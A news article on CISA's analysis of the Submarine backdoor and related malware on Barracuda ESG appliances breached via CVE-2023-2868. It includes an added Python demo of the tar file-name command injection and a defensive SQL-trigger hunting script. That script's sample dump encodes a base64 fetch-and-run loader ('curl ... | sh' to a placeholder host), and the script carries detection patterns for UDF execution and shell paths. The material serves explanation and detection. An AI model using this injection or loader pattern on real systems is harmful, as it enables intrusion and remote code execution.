31 July 2023

Hackers deployed new Submarine backdoor on compromised Barracuda servers

The US Cybersecurity and Infrastructure Security Agency (CISA) released technical details and Indicators of Compromise related to three different malware families deployed by hackers on compromised Barracuda Email Security Gateway (ESG) appliances.

First disclosed in May 2023, the attacks exploited a then zero-day vulnerability (CVE-2023-2868) to install malware on the compromised appliances. The flaw is a remote command injection in the ESG's screening of incoming email attachments: file names inside a crafted .tar archive were not sanitized before being passed to Perl's qx operator, so an attacker who could get such an archive delivered to the appliance could execute arbitrary system commands with the privileges of the ESG product.
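The injection pattern behind CVE-2023-2868, reproduced as an added example (this is not Barracuda's code; the Perl qx call is stood in for by Python's subprocess so the demo runs stand-alone). A small archive is constructed in memory with one member whose name carries a shell command substitution; the vulnerable scanner interpolates the member name into a shell command line, the hardened one validates the name against an allow-list and passes it as a separate argv element. The echo-based "scan" command and the allow-list regex are assumptions chosen for the demo.

```python
"""Added example: how an unsanitised tar member name becomes command execution.

Not Barracuda's code. The real appliance handed member names to Perl's qx{};
the same mistake is made here with subprocess(shell=True), then fixed.
"""
import io
import re
import subprocess
import tarfile


def build_sample_tar():
    """Constructed sample archive: one benign member and one whose *name*
    contains a shell command substitution. File contents do not matter."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name in ("report.txt", "$(echo INJECTED).txt"):
            data = b"hello"
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def member_names(archive):
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        return tar.getnames()


def scan_vulnerable(archive):
    """Interpolates each member name into a shell command string, the way
    qx{"... $name"} does in Perl. The shell expands $(...) inside the name
    before the 'scanner' command ever sees it."""
    results = []
    for name in member_names(archive):
        cmd = f'echo "scanning {name}"'  # assumed stand-in for the real scan command
        proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        results.append(proc.stdout.strip())
    return results


# Assumed allow-list for member names; tighten it for real attachment handling.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]+$")


def scan_hardened(archive):
    """Reject names outside the allow-list and never hand a name to a shell:
    passing it as its own argv element means no expansion can occur."""
    results = []
    for name in member_names(archive):
        if not SAFE_NAME.fullmatch(name):
            results.append(f"rejected {name!r}")
            continue
        proc = subprocess.run(["echo", f"scanning {name}"], capture_output=True, text=True)
        results.append(proc.stdout.strip())
    return results


if __name__ == "__main__":
    sample = build_sample_tar()
    print("vulnerable:", scan_vulnerable(sample))
    print("hardened:  ", scan_hardened(sample))
```

The vulnerable path reports `scanning INJECTED.txt`, proof that the `$(echo INJECTED)` embedded in the file name was executed by the shell; the hardened path rejects that member outright and only ever runs the benign name as a discrete argument.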

Barracuda identified the vulnerability on May 19, 2023, and pushed a security patch to all ESG appliances worldwide on May 20. Its investigation found evidence that CVE-2023-2868 had been exploited since at least October 2022. The analysis identified three malware families: Saltwater, a trojanized module for the Barracuda SMTP daemon (bsmtpd) that gives the attacker backdoor access; SeaSpy, a persistence backdoor that poses as a legitimate Barracuda service and watches port 25 (SMTP) traffic for a magic packet; and SeaSide, a Lua-based bsmtpd module that extracts a command-and-control address and port from SMTP HELO/EHLO commands and hands them to an external binary that opens a reverse shell.

Now, CISA has published details on a fourth malware family found on hacked devices, which it calls "Submarine."

CISA describes Submarine as a "novel persistent backdoor executed with root privileges that lives in a Structured Query Language (SQL) database on the ESG appliance." The malware comprises multiple artifacts, including a SQL trigger, shell scripts, and a loaded library for a Linux daemon, that together enable execution with root privileges, persistence, command and control, and cleanup. A backdoor kept inside the appliance's database rather than as a file on disk is a concern for any remediation that restores a configuration backup onto a replacement unit, which is consistent with Barracuda's June 6 guidance that compromised appliances be replaced rather than patched.
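A hunting routine for a backdoor of the Submarine kind, added here as an example and not CISA's or Barracuda's code: it pulls CREATE TRIGGER statements out of a mysqldump-style text and flags trigger bodies that reach outside the database (UDF command execution, file writes, shell paths, long base64 blobs). The dump excerpt is constructed for the demo, and the indicator patterns are assumptions, not CISA's published IOCs.

```python
"""Added example: hunt for SQL triggers that behave like a loader.

Not CISA's or Barracuda's code. Indicators and sample dump are constructed.
"""
import re

# Constructed dump excerpt: one ordinary audit trigger, one that decodes a
# script into /tmp and runs it through a sys_exec UDF on every settings update.
SAMPLE_DUMP = """
CREATE TRIGGER audit_users AFTER INSERT ON users FOR EACH ROW
BEGIN
  INSERT INTO audit_log(user_id, action) VALUES (NEW.id, 'insert');
END;

CREATE TRIGGER settings_sync AFTER UPDATE ON settings FOR EACH ROW
BEGIN
  SELECT FROM_BASE64('IyEvYmluL3NoCmN1cmwgaHR0cDovL2V4YW1wbGUuaW52YWxpZC94IHwgc2g=')
    INTO DUMPFILE '/tmp/.s.sh';
  SELECT sys_exec('/bin/sh /tmp/.s.sh');
END;
"""

# Matches CREATE [DEFINER=...] TRIGGER name timing event ON table FOR EACH ROW body END;
TRIGGER_RE = re.compile(
    r"CREATE\s+(?:DEFINER\s*=\s*\S+\s+)?TRIGGER\s+`?(\w+)`?\s+(BEFORE|AFTER)\s+"
    r"(INSERT|UPDATE|DELETE)\s+ON\s+`?(\w+)`?\s+FOR\s+EACH\s+ROW\s+(.*?)\bEND\s*;",
    re.IGNORECASE | re.DOTALL,
)

# Assumed indicators of a trigger doing something other than table bookkeeping.
INDICATORS = {
    "udf_exec": re.compile(r"\bsys_(?:exec|eval)\s*\(", re.IGNORECASE),
    "file_write": re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\b", re.IGNORECASE),
    "file_read": re.compile(r"\bLOAD_FILE\s*\(", re.IGNORECASE),
    "shell_path": re.compile(r"/bin/(?:ba)?sh\b|/tmp/"),
    "base64_blob": re.compile(r"[A-Za-z0-9+/]{40,}={0,2}"),
}


def normalize_dump(text):
    """Strip mysqldump's conditional comment markers (/*!50003 ... */) so the
    trigger DDL inside them is visible to the regex."""
    return re.sub(r"/\*!\d{5}\s?|\*/", "", text)


def parse_triggers(dump_text):
    """Return (name, timing, event, table, body) tuples for every trigger found."""
    return [
        (m.group(1), m.group(2).upper(), m.group(3).upper(), m.group(4), m.group(5))
        for m in TRIGGER_RE.finditer(normalize_dump(dump_text))
    ]


def hunt_triggers(dump_text):
    """Map trigger name -> sorted indicator labels that fired (empty list if clean)."""
    findings = {}
    for name, _timing, _event, _table, body in parse_triggers(dump_text):
        findings[name] = sorted(k for k, rx in INDICATORS.items() if rx.search(body))
    return findings


if __name__ == "__main__":
    for trig, hits in hunt_triggers(SAMPLE_DUMP).items():
        print(f"{trig}: {'clean' if not hits else ', '.join(hits)}")
```

On a live instance the same checks apply to the ACTION_STATEMENT column of information_schema.TRIGGERS; a dump is used here so the example runs offline. Any trigger that fires an indicator deserves a look at what else the appliance carries (the shell scripts and daemon library CISA lists), since the trigger is only the piece that re-launches the rest.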

Google-owned threat intel firm Mandiant linked the Barracuda attacks to a suspected Chinese cyber-espionage group it tracks as UNC4841. The company said the campaign had impacted organizations across the public and private sectors worldwide, with almost a third being government agencies.
